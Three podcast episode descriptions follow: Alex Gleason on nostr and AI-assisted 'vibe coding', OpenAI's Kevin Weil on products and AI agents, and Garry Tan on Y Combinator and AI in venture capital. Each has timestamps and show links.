Alex Gleason was one of the main architects behind Donald Trump's Truth Social. Now he focuses on the intersection of nostr, ai, and bitcoin. We dive deep into how he thinks about the future of nostr and vibe coding: using ai tools to rapidly prototype and ship apps with simple text based prompts.Alex on Nostr: https://primal.net/p/nprofile1qqsqgc0uhmxycvm5gwvn944c7yfxnnxm0nyh8tt62zhrvtd3xkj8fhggpt7fyStacks: https://getstacks.dev/EPISODE: 164BLOCK: 901101PRICE: 957 sats per dollar(00:00:02) Alex's Presentation at the Oslo Freedom Forum(00:01:31) Challenges and Opportunities in Decentralized Platforms(00:02:31) The Role of AI in Decentralized Social Media(00:05:00) Happy Bitcoin Friday(00:06:09) Guest Introduction: Alex Gleason(00:07:02) Truth Social(00:10:35) Challenges of Centralized vs Decentralized Platforms(00:14:01) Bridging Platforms(00:19:13) Limitations and Potential of Mastodon and Bluesky(00:24:08) The Future of AI and Vibe Coding(00:31:08) Empowering Developers with AI(00:38:09) The Impact of AI on Software Development(00:47:02) Building with Getstacks.dev(00:53:04) Impact of AI Models(01:02:01) Monetization and Future of AI Development(01:14:07) Open Source Development in an AI World(01:22:17) Data Preservation Using NostrVideo: https://primal.net/e/nevent1qqs96kxmxc7mufgt6n2rxpphg8ptyx2kl47a7rj389jrwmvjy6rhuhgmfel87support dispatch: https://citadeldispatch.com/donatenostr live chat: https://citadeldispatch.com/streamodell nostr account: https://primal.net/odelldispatch nostr account: https://primal.net/citadelyoutube: https://www.youtube.com/@CitadelDispatchpodcast: https://serve.podhome.fm/CitadelDispatchstream sats to the show: https://www.fountain.fm/rock the badge: https://citadeldispatch.com/shopjoin the chat: https://citadeldispatch.com/chatlearn more about me: https://odell.xyz
This week, I'm speaking with Kevin Weil, Chief Product Officer at OpenAI, who is steering product development at what might be the world's most important company right now.We talk about:(00:00) Episode trailer(01:37) OpenAI's latest launches(03:43) What it's like being CPO of OpenAI(04:34) How AI will reshape our lives(07:23) How young people use AI differently(09:29) Addressing fears about AI(11:47) Kevin's "Oh sh!t" moment(14:11) Why have so many models within ChatGPT?(18:19) The unpredictability of AI product progress(24:47) Understanding model “evals”(27:21) How important is prompt engineering?(29:18) Defining “AI agent”(37:00) Why OpenAI views coding as a prime target use-case(41:24) The "next model test” for any AI startup(46:06) Jony Ive's role at OpenAI(47:50) OpenAI's hardware vision(50:41) Quickfire questions(52:43) When will we get AGI?Kevin's links:LinkedIn: https://www.linkedin.com/in/kevinweil/Twitter/X: @kevinweilAzeem's links:Substack: https://www.exponentialview.co/Website: https://www.azeemazhar.com/LinkedIn: https://www.linkedin.com/in/azharTwitter/X: https://x.com/azeemOur new show:This was originally recorded for "Friday with Azeem Azhar", a new show that takes place every Friday at 9am PT and 12pm ET. You can tune in through Exponential View on Substack.Produced by supermix.io and EPIIPLUS1 Ltd.
Most accelerators fund ideas. Y Combinator funds founders—and transforms them. With a 1% acceptance rate and alumni behind 60% of the past decade's unicorns, YC knows what separates the founders who break through from those who burn out. It's not the flashiest résumé or the boldest pitch but something President Garry Tan says is far rarer: earnestness. In this conversation, Garry reveals why this is the key to success, and how it can make or break a startup. We also dive into how AI is reshaping the whole landscape of venture capital and what the future might look like when everyone has intelligence on tap. If you care about innovation, agency, or the future of work, don't miss this episode. Approximate timestamps: Subject to variation due to dynamically inserted ads. (00:02:39) The Success of Y Combinator (00:04:25) The Y Combinator Program (00:08:25) The Application Process (00:09:58) The Interview Process (00:16:16) The Challenge of Early Stage Investment (00:22:53) The Role of San Francisco in Innovation (00:28:32) The Ideal Founder (00:36:27) The Importance of Earnestness (00:42:17) The Changing Landscape of AI Companies (00:45:26) The Impact of Cloud Computing (00:50:11) Dysfunction with Silicon Valley (00:52:24) Forecast for the Tech Market (00:54:40) The Regulation of AI (00:55:56) The Need for Agency in Education (01:01:40) AI in Biotech and Manufacturing (01:07:24) The Issue of Data Access and The Legal Aspects of AI Outputs (01:13:34) The Role of Meta in AI Development (01:28:07) The Potential of AI in Decision Making (01:40:33) Defining AGI (01:42:03) The Use of AI and Prompting (01:47:09) AI Model Reasoning (01:49:48) The Competitive Advantage in AI (01:52:42) Investing in Big Tech Companies (01:55:47) The Role of Microsoft and Meta in AI (01:57:00) Learning from MrBeast: YouTube Channel Optimization (02:05:58) The Perception of Founders (02:08:23) The Reality of Startup Success Rates (02:09:34) The Impact of OpenAI (02:11:46) The Golden Age of Building Newsletter - The Brain Food newsletter delivers actionable insights and thoughtful ideas every Sunday. It takes 5 minutes to read, and it's completely free. Learn more and sign up at fs.blog/newsletter Upgrade — If you want to hear my thoughts and reflections at the end of the episode, join our membership: fs.blog/membership and get your own private feed. Watch on YouTube: @tkppodcast Learn more about your ad choices. Visit megaphone.fm/adchoices